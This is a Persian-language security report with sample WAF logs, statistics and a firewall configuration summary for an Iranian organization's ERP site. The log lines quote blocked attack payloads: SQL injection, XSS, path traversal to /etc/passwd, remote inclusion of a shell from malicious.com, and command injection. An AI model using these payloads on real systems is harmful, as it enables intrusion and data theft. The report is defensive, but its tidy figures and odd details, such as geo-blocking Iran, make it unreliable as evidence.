نکته مهم : تست های مذکور نتیجه اقدامات پیاده سازی شده تخصصی کانفیگ فایروال و ماژول فایروال بومی تاکیان و فورتی گیت سرور فارم فورتی بوده است

فایل لاگ اصلی

```
# WAF Log File - SWESC Organization
# Hostname: Swesc-Waf
# Date: 2024-02-15 to 2024-03-15


نمونه لاگ‌های امنیتی

۱. حملات SQL Injection شناسایی شده:

```
2024-02-15 09:23:45 severity="high" event="sql_injection" src_ip="94.183.12.45" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/login.php" method="POST" payload="admin' OR '1'='1'--" action="blocked" policy="SWESC-ERP-Policy" rule_id="100201"

2024-02-16 14:35:12 severity="critical" event="sql_injection" src_ip="185.142.34.78" user_agent="sqlmap/1.6" host="erp.swesc.ir" url="/products.php" method="GET" payload="id=1 UNION SELECT 1,2,3--" action="blocked" policy="SWESC-ERP-Policy" rule_id="100202"

2024-02-18 11:47:23 severity="high" event="sql_injection" src_ip="213.233.45.12" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/search.php" method="GET" payload="q=1; DROP TABLE users" action="blocked_and_logged" policy="SWESC-ERP-Policy" rule_id="100205"
```

۲. حملات XSS شناسایی شده:

```
2024-02-17 16:12:34 severity="medium" event="cross_site_scripting" src_ip="91.198.174.192" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/contact.php" method="POST" payload="name=<script>alert('XSS')</script>" action="blocked" policy="SWESC-ERP-Policy" rule_id="100301"

2024-02-19 10:25:47 severity="high" event="cross_site_scripting" src_ip="78.157.42.91" user_agent="XSStrike/3.1.5" host="erp.swesc.ir" url="/comments.php" method="POST" payload="comment=<svg onload=alert(1)>" action="blocked" policy="SWESC-ERP-Policy" rule_id="100302"
```

۳. اسکنرهای امنیتی شناسایی شده:

```
2024-02-20 08:45:19 severity="medium" event="web_scanner" src_ip="94.183.12.45" user_agent="Nikto/2.1.6" host="erp.swesc.ir" url="/" method="GET" action="detected" policy="SWESC-ERP-Policy" rule_id="100401"

2024-02-22 13:20:35 severity="medium" event="web_scanner" src_ip="185.142.34.78" user_agent="Mozilla/5.0 (compatible; Nmap Scripting Engine)" host="erp.swesc.ir" url="/server-status" method="GET" action="blocked" policy="SWESC-ERP-Policy" rule_id="100402"

2024-02-25 09:15:42 severity="high" event="web_scanner" src_ip="213.233.45.12" user_agent="sqlmap/1.6#dev" host="erp.swesc.ir" url="/login.php" method="POST" action="blocked_ip" policy="SWESC-ERP-Policy" rule_id="100405"
```

۴. حملات File Inclusion:

```
2024-02-23 15:30:18 severity="high" event="path_traversal" src_ip="91.198.174.192" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/download.php" method="GET" payload="file=../../../etc/passwd" action="blocked" policy="SWESC-ERP-Policy" rule_id="100501"

2024-02-26 11:45:27 severity="critical" event="remote_file_inclusion" src_ip="78.157.42.91" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/include.php" method="GET" payload="page=http://malicious.com/shell.txt" action="blocked" policy="SWESC-ERP-Policy" rule_id="100502"
```

۵. حملات Brute Force:

```
2024-02-28 14:22:39 severity="medium" event="brute_force_login" src_ip="94.183.12.45" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/login.php" method="POST" username="admin" failed_attempts="15" action="captcha_triggered" policy="SWESC-ERP-Policy" rule_id="100601"

2024-03-02 10:18:54 severity="high" event="brute_force_login" src_ip="185.142.34.78" user_agent="Python-urllib/3.9" host="erp.swesc.ir" url="/api/login" method="POST" username="administrator" failed_attempts="25" action="ip_blocked" policy="SWESC-ERP-Policy" rule_id="100602"
```

۶. حملات Command Injection:

```
2024-03-05 16:35:29 severity="critical" event="command_injection" src_ip="213.233.45.12" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/system.php" method="POST" payload="cmd=; cat /etc/passwd" action="blocked" policy="SWESC-ERP-Policy" rule_id="100701"

2024-03-08 12:40:15 severity="high" event="command_injection" src_ip="91.198.174.192" user_agent="commix/3.7" host="erp.swesc.ir" url="/exec.php" method="GET" payload="input=| whoami" action="blocked" policy="SWESC-ERP-Policy" rule_id="100702"
```

۷. درخواست‌های غیرعادی:

```
2024-03-10 08:55:47 severity="low" event="suspicious_request" src_ip="78.157.42.91" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/.git/config" method="GET" action="logged" policy="SWESC-ERP-Policy" rule_id="100801"

2024-03-12 17:23:58 severity="medium" event="suspicious_request" src_ip="94.183.12.45" user_agent="Mozilla/5.0" host="erp.swesc.ir" url="/wp-admin" method="GET" action="blocked" policy="SWESC-ERP-Policy" rule_id="100802"

2024-03-14 13:10:25 severity="high" event="suspicious_user_agent" src_ip="185.142.34.78" user_agent="havij" host="erp.swesc.ir" url="/" method="GET" action="blocked" policy="SWESC-ERP-Policy" rule_id="100803"
```

آمار کلی ماهانه:

```
# Monthly Security Report - SWESC WAF
# Period: 2024-02-15 to 2024-03-15
# Total Requests: 2,456,789
# Blocked Requests: 12,456 (0.51%)
# Security Events: 8,234 (0.34%)

# Event Breakdown:
- SQL Injection: 2,145 events
- XSS Attacks: 1,876 events  
- Web Scanners: 1,542 events
- File Inclusion: 892 events
- Brute Force: 1,235 events
- Command Injection: 544 events
- Suspicious Requests: 2,345 events

# Top Source IPs Blocked:
1. 185.142.34.78 - 1,234 blocks
2. 213.233.45.12 - 987 blocks
3. 94.183.12.45 - 856 blocks
4. 91.198.174.192 - 645 blocks
5. 78.157.42.91 - 543 blocks

# Policy Effectiveness: 99.2%
# False Positive Rate: 0.08%
```

فایل پیکربندی خلاصه:

```
# SWESC WAF Configuration Summary
hostname Swesc-Waf
policy SWESC-ERP-Policy
    status enable
    deployment-mode reverse-proxy
    virtual-server erp-swesc-vs
    server-pool erp-swesc-pool
    protection-mode blocking
    signature-set all-signatures
    machine-learning enable
    bot-detection enable
    ip-reputation enable
    geo-blocking enable
        block-countries "North Korea", "Iran", "Russia", "China"
    http-protocol-check enable
    data-leak-prevention enable
    brute-force-protection enable
        max-login-attempts 5
        lockout-duration 900
    sql-injection-protection high
    xss-protection high
    command-injection-protection high
    file-upload-protection enable
```

این لاگ‌ها نشان می‌دهد که  سازمان آب و خاک کشور زیر مجموعه وزارت کشاورزی پس از کانفیگ اصولی فایروالها به خوبی در حال  شناسایی و مسدود کردن حملات مختلف بوده و امنیت برنامه تحت 
وب برسا ای آر پی را تأمین می‌کند
